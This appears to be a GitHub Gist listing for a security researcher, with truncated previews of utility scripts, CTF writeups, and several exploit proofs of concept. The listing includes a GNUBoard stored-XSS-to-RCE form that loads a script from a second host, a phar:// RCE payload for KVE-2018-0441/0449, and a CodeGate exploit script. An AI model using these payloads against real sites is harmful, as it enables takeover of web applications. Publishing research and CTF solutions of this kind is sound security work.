
Harold Kim stypr

@stypr
stypr / unzip_different_encoding.py
Created March 17, 2020 04:53
Unzip with different encoding
#!/usr/bin/python
#Nothing on stackoverflow works!
import zipfile
import sys
zip = zipfile.ZipFile('FILENAME', 'r')
zipinfo = zip.infolist()
for _file in zipinfo:
    _file.filename = bytes(_file.filename).decode('cp949')
@stypr
stypr / exploit.html
Last active February 6, 2021 15:11
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@stypr
stypr / papago-api.php
Last active December 30, 2020 17:29
Deobfuscated Papago API (Python/Javascript/PHP) : Blocked as of December 2020
<?php
// Ported from papago.py
// v1: b64_enc(rot13([:16]) + [16:])
/* Derived from stackoverflow */
function uuidgen() {
    return sprintf('%08x-%04x-%04x-%04x-%04x%08x',
        mt_rand(0, 0xffffffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffff), mt_rand(0, 0xffff),
        mt_rand(0, 0xffff), mt_rand(0, 0xffffffff)
@stypr
stypr / README.md
Last active February 9, 2020 07:01
CodeGate 2019 CSP challenge writeup

Solution

  1. if(md5($salt.$api_string) !== $sig){ can be bypassed with a hash length extension attack (didn't do it, but the key length is 12).

  2. Use a custom header and body to trigger the CSP bypass.

@stypr
stypr / README.md
Last active September 18, 2019 09:56
2019 Cyber Operations Challenge Finals Pistol Exploit

Quick Summary

First-blooded this challenge. The server is down, I cannot explain briefly

  1. Comment in the website shows get_perm.php

  2. Another comment in the get_perm.php shows ?remote_debug=1.

  3. Using a php trick, you get a write post privilege.

@stypr
stypr / install.sh
Created August 16, 2019 09:05
Install MobSF Framework on CentOS 7 (with Headless Dynamic Analysis)
#!/bin/bash
# Maintainer: Harold Kim (root@stypr.com)
# Tested in CentOS 7.6.1810
# $ lsb_release -a
# LSB Version: :core-4.1-amd64:core-4.1-noarch
# Distributor ID: CentOS
# Description: CentOS Linux release 7.6.1810 (Core)
# Release: 7.6.1810
# Codename: Core
@stypr
stypr / composer.py
Last active August 17, 2019 19:45
Docker runner for CTF
#!/usr/bin/python
#-*- coding:utf-8 -*-
# Developer: Harold Kim (ho.kim@linecorp.com)
import os
import sys
import time
import urllib
import urllib2
@stypr
stypr / a-z.md
Last active July 22, 2023 12:35
Harekaze CTF 2019 WEB Writeup (Yokosuka Hackers)

A-z

Simple JS Jail challenge.

It is run in a context, so we have nothing to play with but constructor and console.

1337 === eval(our_input)
@stypr
stypr / exploit.py
Last active August 17, 2019 19:28
CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
    return str(random.randint(10**sz, 100**sz))
@stypr
stypr / attack_script.js
Last active August 3, 2019 16:47
KVE-2018-0441, KVE-2018-0449 RCE PoC (Windows Only)
// Payload for the uploaded file.
// var payload = `phar://../data\\file/free/1062687231_CmB8gHok_143f7b739dcab1b6837abdfa39b0109467c35d51.gif/GIF89a.php`;
var payload = `[PAYLOAD_URL]`
// Before attacking, first check whether this is an administrator account that supports this feature.
$.get(`../qa_config.php`, function(d){
    // The field to modify is the one containing "file path", so check only that part first.
    if(d.indexOf(`상단 파일 경로`) !== false){